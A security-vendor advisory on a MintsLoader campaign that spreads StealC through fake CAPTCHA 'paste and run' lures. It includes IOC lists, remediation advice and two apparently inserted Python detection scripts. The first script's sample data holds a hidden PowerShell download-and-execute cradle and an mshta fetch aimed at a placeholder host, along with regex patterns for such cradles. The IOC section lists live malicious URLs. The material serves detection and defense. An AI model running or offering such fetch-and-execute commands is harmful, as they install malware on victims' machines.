Rewterz

MintsLoader Malware Campaign Targets Sectors with StealC and BOINC – Active IOCs

Severity

High

Analysis Summary

Threat hunters have uncovered an ongoing campaign that uses MintsLoader, a PowerShell-based malware loader, to distribute secondary payloads including the StealC information stealer and the legitimate open-source network computing platform BOINC. According to the researchers' analysis, MintsLoader is delivered through spam emails containing links to KongTuke/ClickFix pages or an obfuscated JScript file.

The campaign, detected in January 2025, targets sectors such as electricity, oil and gas, and legal services in the U.S. and Europe. Attackers use fake CAPTCHA verification prompts on compromised websites to trick users into executing malicious PowerShell scripts. These prompts, known as ClickFix or KongTuke, copy a malicious command to the user's clipboard and instruct the user to paste and run it in the Windows Run prompt.
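A detection check for the paste-and-run step described above, added here as an example and not code from the advisory: it scans process-creation events for an interpreter spawned directly by explorer.exe (the Run prompt pattern) with a download cradle, a hidden or encoded command, or a remote URL on its command line. The events, field names and the placeholder.invalid host are constructed sample data.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style
# (hypothetical sample data, not telemetry from the campaign).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://placeholder.invalid/1.php)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://placeholder.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

# Interpreters a ClickFix/KongTuke lure asks the victim to launch via the Run prompt.
RUN_TARGETS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# Download-and-execute cradles and hidden/encoded switches typical of pasted one-liners.
CRADLE = re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-expression|iex|downloadstring)\b", re.I)
STEALTH = re.compile(r"-w(indowstyle)?\s+h(idden)?|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)
REMOTE = re.compile(r"https?://", re.I)

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(event):
    """Return the reasons an event looks like a ClickFix paste-and-run, or [] if benign."""
    if basename(event["ParentImage"]) != "explorer.exe":
        return []                      # Run prompt launches are children of explorer.exe
    child = basename(event["Image"])
    if child not in RUN_TARGETS:
        return []
    cmd = event["CommandLine"]
    reasons = []
    if CRADLE.search(cmd):
        reasons.append("download cradle")
    if STEALTH.search(cmd):
        reasons.append("hidden window or encoded command")
    if REMOTE.search(cmd):
        reasons.append("remote URL on command line")
    return [f"{child} from explorer.exe: {r}" for r in reasons]

def hunt(events):
    """Map index of each matching event to its list of reasons."""
    return {i: r for i, ev in enumerate(events) if (r := classify(ev))}

if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], reasons)
```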

The attack chain begins with spam emails that lead to the download of a JavaScript file, which executes PowerShell commands to install MintsLoader. The loader then contacts a command-and-control (C2) server to download interim payloads, evades sandboxes using techniques such as a Domain Generation Algorithm (DGA), and ultimately deploys StealC, an information stealer re-engineered from the Arkei stealer and sold as malware-as-a-service (MaaS). StealC avoids infecting systems in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.
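A complementary hunt for the DGA side of the chain, added here as an example rather than code from the advisory: it scores the registered label of each queried name (length, character entropy, low vowel ratio or digits, and the .top TLD used by every domain IOC in this advisory) and flags names that look machine-generated. The log format and the two .top lookalike names are constructed, not real indicators.

```python
import math
import re
from collections import Counter

# Constructed DNS query log lines (hypothetical, not real resolver output).
SAMPLE_DNS_LOG = """\
2025-01-27T10:01:02Z client=10.0.0.12 query=www.example.com type=A
2025-01-27T10:01:05Z client=10.0.0.12 query=qbzu73hvz9k.top type=A
2025-01-27T10:01:06Z client=10.0.0.12 query=mail.example.org type=MX
2025-01-27T10:01:09Z client=10.0.0.12 query=kfhdgjmnbacelmi.top type=A
2025-01-27T10:01:11Z client=10.0.0.17 query=cdn.jsdelivr.net type=A
"""

QUERY_RE = re.compile(r"query=(?P<name>[A-Za-z0-9.-]+)")
SUSPECT_TLDS = {"top"}   # TLD of every domain IOC in this advisory; extend for your environment
VOWELS = set("aeiou")

def shannon_entropy(s):
    """Bits of entropy per character of the label."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def dga_score(fqdn):
    """Heuristic 0..4; higher means the registered label looks machine-generated."""
    labels = fqdn.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return 0
    tld, label = labels[-1], labels[-2]
    score = 0
    if tld in SUSPECT_TLDS:
        score += 1
    if len(label) >= 10:                       # long random labels, as in the IOC list
        score += 1
    if shannon_entropy(label) >= 3.0:          # near-uniform character distribution
        score += 1
    vowel_ratio = sum(ch in VOWELS for ch in label) / len(label)
    if vowel_ratio < 0.25 or any(ch.isdigit() for ch in label):
        score += 1                             # unpronounceable or digit-laden label
    return score

def flag_dns_log(log_text, threshold=3):
    """Return the queried names whose score reaches the threshold, in log order."""
    flagged = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and dga_score(m.group("name")) >= threshold:
            flagged.append(m.group("name"))
    return flagged

if __name__ == "__main__":
    for name in flag_dns_log(SAMPLE_DNS_LOG):
        print(name, dga_score(name))
```

Treat a hit as a lead for review against your IOC feed and passive DNS, not as a verdict on its own.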

Simultaneously, the Astolfo Loader (JinxLoader V3), a rewritten version of JinxLoader in C++, highlights the affordability and proliferation of malicious tools on hacking forums. Researchers also identified GootLoader campaigns using search engine optimization (SEO) poisoning to redirect users to compromised WordPress sites hosting fake forums. These sites dynamically load malware via a "mothership" server, employing obfuscation, geofencing, and IP blocking to evade detection, making remediation challenging even for site owners.

Together, these campaigns underline the evolving sophistication of malware operations and the continued use of deceptive social engineering techniques to target victims across industries.

Impact

  • Sensitive Data Theft
  • Financial Loss

Indicators of Compromise

Domain Name

IP

  • 145.223.100.233
  • 67.217.228.118
  • 45.61.136.138

MD5

  • 46859e09844b9a698f15023607afa509
  • 902c133812718bacf8e86a6d8bbeb22d
  • 760f00e30887017cdea9809fd1c38e52

SHA-256

  • b8804a7ef09a9c1e8ede3a86a087b754b42f5b37c6de1e82c86f38d01c297ee2
  • 138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa
  • 91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3

SHA-1

  • cdcc6faff70801edb2324d8472619d0b338f8080
  • 23ae2fdaf0c85b08e13ef68d925997c08a19a1f9
  • b09271e96ff73b86bd54489fbae1c224369a8bc8

URL

  • https://t1jm05fdu6748emu5oon8nix1uk2ogyn.lovesnextmeeting.com/Uswl5JAnXI
  • http://mubuzb3vvv.top/1.php?s=527
  • http://62.204.41.177/edd20096ecef326d.php

Remediation

  • Block all threat indicators at your respective controls.
  • Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
  • Do not download documents attached to emails from unknown sources, and refrain from enabling macros when the source is not trusted.
  • Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
  • Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
  • Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
  • Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
  • Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
  • Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
  • Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.
  • Block the execution of HTA files and restrict macros in email attachments and downloaded files.